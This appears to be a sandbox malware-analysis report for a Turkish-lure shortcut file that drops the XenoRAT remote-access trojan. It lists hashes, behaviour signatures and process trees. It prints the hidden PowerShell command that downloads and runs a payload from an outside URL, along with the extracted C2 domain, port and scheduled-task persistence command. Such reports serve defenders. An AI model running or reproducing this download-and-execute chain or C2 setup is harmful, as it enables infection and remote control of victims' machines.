Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system -
submitted
03/05/2024, 13:00
Static task
static1
Behavioral task
behavioral1
Sample
Dekontu/Odeme -(Mayis).lnk
Resource
win7-20240221-en
General
-
Target
Dekontu/Odeme -(Mayis).lnk
-
Size
2KB
-
MD5
2ad899ef7b0d361186d8487950b7e167
-
SHA1
151d04d656e68152cc2116b0837331a7df30eb27
-
SHA256
2ebd9ab34d58f221ce2034b9f43ad8b128fbc683dab962fbf6222b4eef2a3618
-
SHA512
2a84054d0f22a042eb2390dba4831eea02700334531e09a3e4ce3b7ca0db71d12ea7d0de30b19280ac0fe746002f4fc96a4904832c81b3dac6647c4a9a50b39b
Malware Config
Extracted
https://www.dobiamfollollc.online/konzjrngodznhitsthjfxjydtjytddy/uiuGJRSgfzjzdgzdghstRgsgtesht/cfhfcg.pif
Extracted
xenorat
dns.requimacofradian.site
Xeno_rat_nd8818g
-
delay
60000
-
install_path
appdata
-
port
1243
-
startup_name
uic
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 10 3856 PoWeRShElL.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3856 PoWeRShElL.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation screenbiwus.pif -
Executes dropped EXE 8 IoCs
pid Process 1172 screenbiwus.pif 964 screenbiwus.pif 4292 screenbiwus.pif 4492 screenbiwus.pif 2572 screenbiwus.pif 3544 screenbiwus.pif 1588 screenbiwus.pif 2176 screenbiwus.pif -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 1172 set thread context of 964 1172 screenbiwus.pif 92 PID 1172 set thread context of 4292 1172 screenbiwus.pif 93 PID 1172 set thread context of 4492 1172 screenbiwus.pif 94 PID 2572 set thread context of 3544 2572 screenbiwus.pif 98 PID 2572 set thread context of 1588 2572 screenbiwus.pif 99 PID 2572 set thread context of 2176 2572 screenbiwus.pif 101 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 4596 3544 WerFault.exe 98 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4444 schtasks.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings PoWeRShElL.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3856 PoWeRShElL.exe 3856 PoWeRShElL.exe 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif 4292 screenbiwus.pif -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3856 PoWeRShElL.exe Token: SeDebugPrivilege 1172 screenbiwus.pif Token: SeDebugPrivilege 2572 screenbiwus.pif Token: SeDebugPrivilege 4292 screenbiwus.pif -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2244 OpenWith.exe -
Suspicious use of WriteProcessMemory 59 IoCs
description pid Process procid_target PID 4656 wrote to memory of 3856 4656 cmd.exe 86 PID 4656 wrote to memory of 3856 4656 cmd.exe 86 PID 3856 wrote to memory of 1172 3856 PoWeRShElL.exe 90 PID 3856 wrote to memory of 1172 3856 PoWeRShElL.exe 90 PID 3856 wrote to memory of 1172 3856 PoWeRShElL.exe 90 PID 1172 wrote to memory of 964 1172 screenbiwus.pif 92 PID 1172 wrote to memory of 964 1172 screenbiwus.pif 92 PID 1172 wrote to memory of 964 1172 screenbiwus.pif 92 PID 1172 wrote to memory of 964 1172 screenbiwus.pif 92 PID 1172 wrote to memory of 964 1172 screenbiwus.pif 92 PID 1172 wrote to memory of 964 1172 screenbiwus.pif 92 PID 1172 wrote to memory of 964 1172 screenbiwus.pif 92 PID 1172 wrote to memory of 964 1172 screenbiwus.pif 92 PID 1172 wrote to memory of 4292 1172 screenbiwus.pif 93 PID 1172 wrote to memory of 4292 1172 screenbiwus.pif 93 PID 1172 wrote to memory of 4292 1172 screenbiwus.pif 93 PID 1172 wrote to memory of 4292 1172 screenbiwus.pif 93 PID 1172 wrote to memory of 4292 1172 screenbiwus.pif 93 PID 1172 wrote to memory of 4292 1172 screenbiwus.pif 93 PID 1172 wrote to memory of 4292 1172 screenbiwus.pif 93 PID 1172 wrote to memory of 4292 1172 screenbiwus.pif 93 PID 1172 wrote to memory of 4492 1172 screenbiwus.pif 94 PID 1172 wrote to memory of 4492 1172 screenbiwus.pif 94 PID 1172 wrote to memory of 4492 1172 screenbiwus.pif 94 PID 1172 wrote to memory of 4492 1172 screenbiwus.pif 94 PID 1172 wrote to memory of 4492 1172 screenbiwus.pif 94 PID 1172 wrote to memory of 4492 1172 screenbiwus.pif 94 PID 1172 wrote to memory of 4492 1172 screenbiwus.pif 94 PID 1172 wrote to memory of 4492 1172 screenbiwus.pif 94 PID 964 wrote to memory of 2572 964 screenbiwus.pif 97 PID 964 wrote to memory of 2572 964 screenbiwus.pif 97 PID 964 wrote to memory of 2572 964 screenbiwus.pif 97 PID 2572 wrote to memory of 3544 2572 screenbiwus.pif 98 PID 2572 wrote to memory of 3544 2572 screenbiwus.pif 98 PID 2572 wrote to memory of 3544 2572 screenbiwus.pif 98 PID 2572 wrote to memory of 3544 2572 screenbiwus.pif 98 PID 2572 wrote to memory of 3544 2572 screenbiwus.pif 98 PID 2572 wrote to memory of 3544 2572 screenbiwus.pif 98 PID 2572 wrote to memory of 3544 2572 screenbiwus.pif 98 PID 2572 wrote to memory of 3544 2572 screenbiwus.pif 98 PID 2572 wrote to memory of 1588 2572 screenbiwus.pif 99 PID 2572 wrote to memory of 1588 2572 screenbiwus.pif 99 PID 2572 wrote to memory of 1588 2572 screenbiwus.pif 99 PID 2572 wrote to memory of 1588 2572 screenbiwus.pif 99 PID 2572 wrote to memory of 1588 2572 screenbiwus.pif 99 PID 2572 wrote to memory of 1588 2572 screenbiwus.pif 99 PID 2572 wrote to memory of 1588 2572 screenbiwus.pif 99 PID 2572 wrote to memory of 1588 2572 screenbiwus.pif 99 PID 2572 wrote to memory of 2176 2572 screenbiwus.pif 101 PID 2572 wrote to memory of 2176 2572 screenbiwus.pif 101 PID 2572 wrote to memory of 2176 2572 screenbiwus.pif 101 PID 2572 wrote to memory of 2176 2572 screenbiwus.pif 101 PID 2572 wrote to memory of 2176 2572 screenbiwus.pif 101 PID 2572 wrote to memory of 2176 2572 screenbiwus.pif 101 PID 2572 wrote to memory of 2176 2572 screenbiwus.pif 101 PID 2572 wrote to memory of 2176 2572 screenbiwus.pif 101 PID 4292 wrote to memory of 4444 4292 screenbiwus.pif 115 PID 4292 wrote to memory of 4444 4292 screenbiwus.pif 115 PID 4292 wrote to memory of 4444 4292 screenbiwus.pif 115
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Dekontu\Odeme -(Mayis).lnk"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4656 -
C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe"C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command srms-apr.dat;(new-object System.Net.WebClient).DownloadFile('https://www.dobiamfollollc.online/konzjrngodznhitsthjfxjydtjytddy/uiuGJRSgfzjzdgzdghstRgsgtesht/cfhfcg.pif','screenbiwus.pif');./'screenbiwus.pif';(get-item 'screenbiwus.pif').Attributes += 'Hidden';2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3856 -
C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif"C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1172 -
C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pifC:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif"C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pifC:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif6⤵
- Executes dropped EXE
PID:3544 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3544 -s 127⤵
- Program crash
PID:4596
-
-
-
C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pifC:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif6⤵
- Executes dropped EXE
PID:1588
-
-
C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pifC:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif6⤵
- Executes dropped EXE
PID:2176
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pifC:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4292 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /Create /TN "uic" /XML "C:\Users\Admin\AppData\Local\Temp\tmp2D74.tmp" /F5⤵
- Creates scheduled task(s)
PID:4444
-
-
-
C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pifC:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif4⤵
- Executes dropped EXE
PID:4492
-
-
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2244
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3544 -ip 35441⤵PID:4444
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
706B
MD5d95c58e609838928f0f49837cab7dfd2
SHA155e7139a1e3899195b92ed8771d1ca2c7d53c916
SHA2560407c814aef0d62aec7fd39b7c2f614746f0d8ff41f8ef957736f520f14b0339
SHA512405310b29a833604c6627063bfdcf055a197e01f633ef21da238f1a6415a02e21315d689b4a6669db23e82152bed6f3492afb60963e6b2a0e9bb2ac09a480b5d
-
Filesize
243KB
MD5f6839c83a19cfb9112997be29ba02a88
SHA1b558ada6c8f1603b8c700a74afc33bfbb14ac713
SHA25609d6f45a4cf61b2eaf9b715c712d6e61410a7d838b71e31fa4b12c012afb2d90
SHA5120724132c9cbdd1394cc3e17d557c7c82b8e30b34b1adc207f7b77dc498b63e5c03768de88b261bd986cfe18ab8a70ff77c4dabc5b215d58a959287c7f38fdd8b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD5cd6994537023694f4533ff4244156d8a
SHA1b581d11e2cad75bd5b7e440169f423cb18117a40
SHA256b03bd499a8ab96f583f7029110764a3a08ecd976f4e2ec9e7b74c414d20c6707
SHA512f9d3f71138a6af0d0435d3b66b7277a92696050dc3f3fdfb2842f02d8bf2a948342101da4747e74d003c23dd13799d4940496043fad866b9bc2045de54ea9cd0